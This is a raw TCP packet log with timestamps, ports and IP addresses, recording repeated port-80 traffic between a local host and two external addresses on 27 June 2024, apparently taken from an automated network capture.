Jun 27, 2024 05:59:00.697727919 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.697858095 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.697871923 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.697886944 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.697901011 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.697902918 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.697920084 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.697935104 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.698019981 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698035002 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698064089 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.698080063 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.698117018 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698160887 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.698210955 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698225021 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698239088 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698254108 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698262930 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.698270082 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698297024 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.698309898 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.698473930 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698487997 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698502064 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698517084 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698532104 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.698532104 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698544025 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.698574066 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.698723078 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698736906 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698750973 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698764086 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698766947 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.698787928 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698793888 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.698817015 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.698841095 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.698947906 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698962927 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698977947 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.698987961 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.698997974 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699019909 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699165106 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699179888 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699193954 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699203968 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699210882 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699219942 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699225903 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699243069 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699249029 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699250937 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699264050 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699270010 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699276924 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699280977 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699296951 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699315071 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699337959 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699546099 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699561119 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699577093 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699588060 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699611902 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699731112 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699745893 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699759960 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699770927 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699774981 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699790955 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699798107 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699819088 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699858904 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699873924 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699887037 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.699903011 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699914932 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.699939966 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.725728989 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.725771904 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.725778103 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.725788116 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.725811958 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.725825071 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.725862980 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.725877047 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.725891113 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.725899935 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.725912094 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.725934029 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.725987911 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.726047039 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.726084948 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.726100922 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.726114988 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.726129055 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.726129055 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.726138115 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.726144075 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.726159096 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.726162910 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.726172924 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.726191044 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.726202011 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.726362944 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.726407051 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.749785900 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.749806881 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.749830008 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.749839067 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.749845028 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.749859095 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.749864101 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.749878883 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.749886036 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.749907970 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.749979019 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.749994040 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.750009060 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.750025034 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.750032902 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.750040054 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.750056028 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.750066996 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.750087023 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.750113010 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.750210047 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.750291109 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.750305891 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.750319958 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.750332117 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.750334978 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.750351906 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.750379086 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.781486034 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.781502008 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.781517029 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.781609058 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.781622887 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.781637907 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.781653881 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.781683922 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.781683922 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.781683922 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.781683922 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.782146931 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782217979 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782232046 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782263041 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.782273054 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.782284021 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782299042 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782337904 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.782424927 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782438993 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782454014 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782465935 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.782494068 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.782536983 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782550097 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782577038 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.782588959 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782599926 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.782605886 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782643080 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.782743931 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782757998 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782772064 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782778025 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.782787085 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782809019 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.782831907 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.782887936 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782902956 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782942057 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.782958031 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782973051 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782985926 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.782996893 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.783000946 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.783015966 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.783021927 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.783031940 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.783045053 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.783072948 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.783278942 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.783354998 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.783369064 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.783396959 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.783406019 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.783437967 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.783452034 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.783464909 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.783478975 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.783490896 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.783520937 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.783607006 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.783646107 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.784327030 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.784365892 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.784379005 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.784393072 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.784416914 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.784426928 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.784465075 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.784493923 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.784508944 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.784534931 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.784557104 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.784640074 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.784655094 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.784727097 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.784740925 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.784828901 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.784857035 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.784872055 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.784885883 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.784899950 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.784902096 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.784918070 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.784926891 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.784949064 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.785003901 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.785047054 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.785151958 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.785164118 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.785178900 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.785195112 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.785283089 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.785393000 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.785408020 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.785423040 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.785435915 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.785449982 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.785465002 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.785478115 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.785486937 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.785528898 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.785742998 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.785758972 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.785798073 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786235094 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786278963 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786283970 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786298990 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786320925 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786334991 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786386967 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786401987 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786416054 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786431074 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786434889 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786463976 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786488056 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786519051 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786534071 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786556005 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786567926 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786581993 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786597967 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786611080 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786619902 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786631107 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786649942 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786833048 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786849976 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786864042 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786873102 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786878109 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786884069 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786894083 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786906004 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786917925 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786928892 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786931992 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786945105 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786961079 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786964893 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786977053 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.786983013 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.786994934 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.787015915 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.787072897 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.787110090 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.812547922 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.812594891 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.812678099 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.812691927 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.812705994 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.812721014 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.812733889 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.812733889 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.812747955 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.812751055 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.812772036 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.812803030 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.812803030 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.812839985 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.812843084 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.812855959 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.812876940 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.812892914 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.813030958 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.813045979 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.813059092 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.813072920 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.813074112 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.813091040 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.813105106 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.813185930 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.813277006 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.821619034 CEST	49749	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:59:00.822005987 CEST	49751	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:59:00.826884985 CEST	80	49751	185.172.128.116	192.168.2.7
Jun 27, 2024 05:59:00.827035904 CEST	49751	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:59:00.827069044 CEST	80	49749	185.172.128.116	192.168.2.7
Jun 27, 2024 05:59:00.827119112 CEST	49749	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:59:00.836896896 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.836941957 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.836973906 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.836988926 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.837013960 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.837033033 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.837064028 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.837078094 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.837093115 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.837116003 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.837146044 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.837249994 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.837269068 CEST	80	49748	77.91.77.81	192.168.2.7
